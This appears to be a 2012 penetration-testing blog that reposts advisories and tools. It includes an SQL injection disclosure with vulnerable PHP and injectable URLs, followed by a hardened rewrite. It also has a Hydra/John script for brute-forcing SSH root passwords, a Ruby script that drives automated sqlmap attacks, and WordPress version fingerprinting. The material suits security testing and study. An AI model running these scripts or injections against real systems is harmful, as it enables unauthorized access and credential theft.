Jun 1, 2012

Simple Web Content Management System SQL Injection

If you want all the vulnerabilities from this post, please go to the Source.

######################################################################################
# Exploit Title: Simple Web Content Management System SQL Injection
# Date: May 30th 2012
# Author: loneferret
# Version: 1.1
# Application Url: http://www.cms-center.com/
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23
######################################################################################
# Discovered by: loneferret
######################################################################################

# Side note:
# This application is nothing fancy, and really shouldn't be used other than
# for practicing SQLi. Pretty much every page has at least one (1) vulnerable
# parameter.

# Vulnerability:
# Due to improper input sanitization, many parameters are prone to SQL injection.
# Most of them require you to be authenticated with an account (admin).
# But there are a few pages that will cause an error without having to log on.


# PoC 1:
# No Authentication Required.
# Page: /admin/item_delete.php?id=[SQLi]
# Vulnerable Parameter: id
# Code:
$id = $_GET['id'];
$title = NULL;
$text = NULL;
database_connect();
$query = "select title,text from content where id = $id;";
//echo $query;
$result = mysql_query($query);

# As stated, nothing is checked before passing "id" to MySQL.
# This results in a MySQL error.



# PoC 2:
# No Authentication Required.
# Page: /admin/item_status.php?id=[SQLi]&status=1
# Page: /admin/item_status.php?id=1&status=[SQLi]
# Vulnerable Parameter: id & status
# Code:
$ref = $_GET['ref'];
$id = $_GET['id'];
$status = $_GET['status'];
$update = "UPDATE content
        SET status='$status'
        WHERE id='$id'";
$query = mysql_query($update)
    or die("Their was a problem updating the status: ". mysql_error());

# As stated, nothing is checked before passing "id" and/or "status" to MySQL.
# This results in a MySQL error.
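As an added example (not part of the advisory or of the application's own code), the two snippets above rewritten so that user input never reaches the query text: the values are validated as integers and bound through PDO prepared statements. database_connect() returning a PDO handle is an assumption; the table and column names are the ones shown on the page.

```php
<?php
// Added example: hardened versions of item_delete.php / item_status.php.
// Assumption: database_connect() returns a PDO handle connected to the same
// database, with PDO::ATTR_EMULATE_PREPARES disabled so MySQL binds the values.

function fetch_item(PDO $db, $raw_id)
{
    // id must be a positive integer; anything else is rejected before reaching MySQL
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    if ($id === false) {
        return null; // caller answers with HTTP 400, not with a MySQL error
    }
    // placeholder binding: the value travels separately from the statement text
    $stmt = $db->prepare('SELECT title, text FROM content WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC); // false when no such row exists
}

function set_item_status(PDO $db, $raw_id, $raw_status)
{
    $id = filter_var($raw_id, FILTER_VALIDATE_INT, array('options' => array('min_range' => 1)));
    // status is a flag on the page (status=1); allow only 0 or 1
    $status = filter_var($raw_status, FILTER_VALIDATE_INT,
                         array('options' => array('min_range' => 0, 'max_range' => 1)));
    if ($id === false || $status === false) {
        return null;
    }
    $stmt = $db->prepare('UPDATE content SET status = :status WHERE id = :id');
    $stmt->bindValue(':status', $status, PDO::PARAM_INT);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount(); // number of rows actually updated
}

// Usage as the admin pages would call it. The advisory notes these pages need no
// login at all, so a real fix also checks the admin session before this point.
$db = database_connect();
$raw_id = isset($_GET['id']) ? $_GET['id'] : '';
if (isset($_GET['status'])) {
    $result = set_item_status($db, $raw_id, $_GET['status']);
} else {
    $result = fetch_item($db, $raw_id);
}
if ($result === null) {
    header('HTTP/1.0 400 Bad Request');
    exit('invalid id or status');
}
```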


Source: http://www.exploit-id.com/web-applications/simple-web-content-management-system-1-1-multiple-sql-injection

If you like my blog, Please Donate Me

May 31, 2012

Metasploit 4 on iPhone 4S & iPad 2

# Install basic tools
apt-get update
apt-get dist-upgrade
apt-get install wget subversion

# Download correct version of ruby and dependencies
wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb

# Install them
dpkg -i iconv_1.14-1_iphoneos-arm.deb
dpkg -i zlib_1.2.3-1_iphoneos-arm.deb
dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb

# Delete them
rm -rf *.deb

# Go into /private/var and svn checkout the msf trunk.
# Don't download the MSF tar.gz due to svn client versioning issues
cd /private/var
svn co https://www.metasploit.com/svn/framework3/trunk/ msf3
cd msf3/

# Check that Metasploit is running
ruby msfconsole


Source: https://www.offensive-security.com/offsec/metasploit-4-on-iphone-4s-and-ipad-2/

May 29, 2012

SSLsplit – transparent and scalable SSL/TLS interception

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.
SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. SSLsplit can also use existing certificates of which the private key is available, instead of generating forged ones. SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way.

Source: http://www.roe.ch/SSLsplit


SQLCake - an automatic sql injection exploitation kit

What is sqlcake?

sqlcake is an automatic SQL injection exploitation kit written in Ruby. It's designed for system administration and penetration testing.

sqlcake offers a few useful functions to gather database information easily through SQL injection.

sqlcake also allows you to bypass magic quotes, dump tables and columns and gives you the possibility to run an interactive MySQL shell.

sqlcake supports union stacked queries for real fast processing and blind injections with logarithmic techniques for saving time.


Source: http://sqlcake.sourceforge.net/

May 28, 2012

THC-Hydra password bruteforcing with john the ripper - http://funoverip.net

#!/bin/sh

hydra="/usr/local/bin/hydra"
john="/usr/bin/john"

hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20   # time (seconds) to run john

tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"

if [ "$1" = "" ];then
    echo "Usage: $0 <john session file>"
    exit 0
fi

#for lfile in `ls $loginfiles*`;do

while [ 1 ];do
    # generate some passwords with john the ripper
    echo; echo "- Start (re)generating passwords with John"
    if [ -e "$john_sessionfile.rec" ];then
        # if session exist, restore it
        $john --restore=$john_sessionfile  > $tmp_passwd &
    else
        # if session not exist yet, create it
        $john $john_all_params --session=$john_sessionfile > $tmp_passwd &
    fi

    # wait $john_time_step seconds, then kill john and start hydra on its output
    echo "- Wait ..."
    sleep $john_time_step
    echo "- Kill john"
    killall john 2>/dev/null 1>/dev/null
    sleep 1

    # start hydra
    echo; echo "- Start hydra"; echo

    rm -f $hydra_logfile
    echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
    $hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile

    # if a valid pair has been found, stop the loop
    if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then
        echo; echo "FOUND !!"
        grep $hydra_module $hydra_logfile | grep -v DATA
        exit 0
    fi

done


Source: http://funoverip.net/2010/12/thc-hydra-password-bruteforcing-with-john-the-ripper/

jasagerpwn - Jasager attack vector script for BackTrack 5 and Ubuntu.

This script is going to assume you're using BackTrack 4/5 with /pentest/; if you have it somewhere else, just adjust the variables accordingly.

This can work with normal Ubuntu as well, but keep in mind the setup of the OS will take some more work and general Linux skill.

The following dependencies are required for full functionality of the script.

Dependencies: PHP5, Apache2, INSTALLED Metasploit, Social Engineering Toolkit, Macchanger, Dsniff Suite, DHCP3, INSTALLED SSLstrip, INSTALLED airdrop-ng, Aircrack-ng suite w/ working Injection.



Source: https://code.google.com/p/jasagerpwn/


May 25, 2012

How to use SQLMap POST Request Injection

If you want to see the original post, please go to the Source. 

1. Browse to the target site that has a form.
2. Use any intercepting proxy, such as Burp or OWASP Zed, to intercept the request from your web browser.
3. Click the submit button of the form on that web page.
4. Capture and save the request to a file [post.txt].
5. Run SQLMap with option -r to read post.txt, which gives it the request details needed for the attack, and -p to name the specific parameter to test.


Source: http://hackertarget.com/sqlmap-post-request-injection/#.T74mX5-I3vY.twitter
May 24, 2012

Automating SQLMap with data from wapiti By Brandon Perry

This version was modified to use in Backtrack 5 R2 (ruby1.9.4dev); if you want the original version, please go to the Source.

You must save this script in the wapiti path.

#!/usr/bin/env ruby

require 'securerandom'
require 'rexml/document'

wapiti_path = '/pentest/web/wapiti/'
sqlmap_path = '/pentest/database/sqlmap-dev/'

# URL-encoded probe string wapiti injects into the parameter it reports as vulnerable
marker = "%BF%27%22%28"

wapiti_report_path = '/tmp/wapiti_report_' + SecureRandom.uuid + '.xml'

remote_host = ARGV[0]
abort "Usage: #{$0} <target url>" if remote_host.nil?

p "Running wapiti..."

system "#{wapiti_path}wapiti.py #{remote_host} -f xml -o #{wapiti_report_path}"

p "Report saved to #{wapiti_report_path}"

p "Parsing results"

results = []

doc = REXML::Document.new(File.read(wapiti_report_path))

doc.elements.each('/report/bugTypeList/bugType') do |element|
  bug_type = element.attributes["name"]

  next if bug_type != "SQL Injection"

  p "Parsing " + bug_type

  element.elements.each("bugList/bug") do |bug|
    result = { :type => bug_type }

    bug.elements.each do |child|
      if child.name == "url"
        result[:url] = child.text
      elsif child.name == "parameter"
        result[:parameter] = child.text
      end
    end
    results << result
  end
end

results.each do |result|
  next if result[:type] !~ /SQL Injection/
  p "Running sqlmap"

  if result[:url].index(result[:parameter])
    # GET: the reported parameter is part of the query string; swap the marker for a harmless value
    url = result[:url].gsub(marker, "abcd")

    params = result[:url].split("?")[1].split("&")

    # parameters wapiti did not flag are handed to sqlmap's --skip
    skipped_params = []
    params.each do |param|
      skipped_params << param.split("=")[0] if not param.index(marker)
    end

    p "Running GET sql injection test on url: " + url
    sqlmap_command = "#{sqlmap_path}sqlmap.py -u \"#{url}\" --smart --skip=\"#{skipped_params.join(",")}\" --technique=EUS --flush-session --fresh-queries --level=2 --batch"
    out = `#{sqlmap_command}`
    # print rather than printf: a '%' in sqlmap's output would otherwise be read as a format directive
    print out
  else
    # POST: the reported parameter is the request body
    url = result[:url]
    p "Running POST sql injection test on url: " + url
    p "With data: " + result[:parameter]

    parameter = result[:parameter].gsub(marker, "abcd")

    params = result[:parameter].split("&")

    skipped_params = []
    params.each do |param|
      skipped_params << param.split("=")[0] if not param.index(marker)
    end

    sqlmap_command = "#{sqlmap_path}sqlmap.py -u \"#{url}\" --data=\"#{parameter}\" --skip=\"#{skipped_params.join(",")}\" --smart --technique=EUS --flush-session --fresh-queries --level=2 --batch"
    p sqlmap_command
    sqlmap_output = `#{sqlmap_command}`
    print sqlmap_output
  end
end

Source:  http://volatile-minds.blogspot.com/2012/05/automating-sqlmap-with-data-from-wapiti.html/
 
Wordpress version finder

If you request domain.com/wp-login.php you will get this in the HTML response:
<link rel='stylesheet' id='colors-fresh-css' href='$DOMAIN/wp-admin/css/colors-fresh.css?ver=$VERSION' type='text/css' media='all' />
(or in older versions)
<link rel='stylesheet' id='login-css' href='$DOMAIN/wp-admin/css/login.css?ver=$VERSION' type='text/css' media='all' />
Each $VERSION relates to a different WordPress version.

With the help of core.svn.wordpress.org/tags/2.7/wp-includes/script-loader.php
(2.8/wp-includes/script-loader.php, etc.) I made a list

WP-version $colors_version
2.7   20081210
2.7.1 20081210
2.8   20090610
2.8.1 20090625
2.8.2 20090625
2.8.3 20090625
2.8.4 20090625
2.8.5 20090625
2.8.6 20090625
2.9   20091217
2.9.1 20091217
2.9.2 20091217
3.0   20100610
3.0.1 20100610
3.0.2 20100610
3.0.3 20100610
3.0.4 20100610
3.0.5 20100610
3.0.6 20100610
3.1   20110121
3.1.1 20110121
3.1.2 20110121
3.1.3 20110121
3.1.4 20110121
3.2   20110703
3.2.1 20110703
3.3   20111206
3.3.1 20111206

This can be brought down to:

2.7   20081210
2.7.x 20081210
2.8   20090610
2.8.x 20090625
2.9   20091217
2.9.x 20091217
3.0   20100610
3.0.x 20100610
3.1   20110121
3.1.x 20110121
3.2   20110703
3.2.x 20110703
3.3   20111206
3.3.x 20111206 
 
 
 
Source: http://0xa.li/wordpress-version-finder/ 


May 23, 2012

PDF Examiner

View PDF objects as hex/text, PDF dissector and inspector, scan for known exploits (CVE-2007-5659, CVE-2009-0927, CVE-2008-2992, CVE-2009-4324, CVE-2009-3954, CVE-2009-3953, CVE-2009-3959, CVE-2009-1493, CVE-2010-0188, CVE-2010-1297, CVE-2010-2883, CVE-2010-3654, CVE-2010-4091, CVE-2011-0609, CVE-2011-0611, CVE-2011-2462, CVE-2011-4369 and embedded /Action commands), process PDF compression (FlateDecode, ASCIIHexDecode, LZWDecode, ASCII85Decode, RunLengthDecode, CCITTFaxDecode Group 3 1D), encryption (40+128 bit RC4, 128 bit AESV2, 256 bit AESV3), and obfuscation (unicode, Hex, fromCharCode). Browse objects.

Source: https://www.malwaretracker.com/pdf.php
